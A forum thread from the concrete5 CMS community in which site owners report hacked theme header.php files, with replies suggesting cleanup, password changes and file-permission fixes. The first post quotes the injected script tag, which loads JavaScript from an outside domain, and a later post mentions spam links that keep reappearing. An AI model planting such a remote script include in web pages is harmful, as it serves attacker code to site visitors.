elements/header.php hacked

Permalink
Hi!

A couple of my sites have been hacked.
Just before closing the head-section in /themes/themename/elements/header.php, there's a new javascript source injected, which I haven't put there!!!

<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script></head>


Sites where I've named it head.php instead of header.php are OK.
How should we chmod protect our theme files, without breaking the theme?

Best wishes,
Nick

nickratering
 
rainmaker replied on at Permalink Reply
rainmaker
Hello!

I would remove the script for starters. If you want to change the Header, just copy the header.php, rename it to head.php and then change all the page types.
juliandale replied on at Permalink Reply
juliandale
Are any other sites hosted under the same hosting account? The only time I have had a C5 site 'hacked' was because it was an addon/subdomain of a hosting account that had another site (not mine) running an old version of Joomla.

If you update your hosting password, update your C5 password/s and the site gets hacked again, then you'll probably find your host has a vulnerable site hosted on it.
nickratering replied on at Permalink Reply
nickratering
Thank you for your answers!
The sites are not on the same account, but they are on the same hosting company! I've informed them.
I'll update all passwords and CHMOD config files to 600.
heathersh replied on at Permalink Reply
heathersh
I had this happen to me as well over the last couple of days. All files labeled header.php and header_newsflow.php and it keeps coming back after I delete it. It's happening across over a dozen sites, all with the same hosting company but different login details. Is it possible that there is a new vulnerability being exploited and C5? I've spoken with the hosting company and they're not finding any obvious vulnerability on their side. All sites are on the latest version of concrete5 (5.6.2.1).

Also, as an update, only my concrete5 header files are hacked. And it's any concrete5 file that contains the text "header" in it. The word press files that are on the same host are not experiencing the "header" hack. The code being inserted are plain links, nothing special - linking to cheap cialis, etc.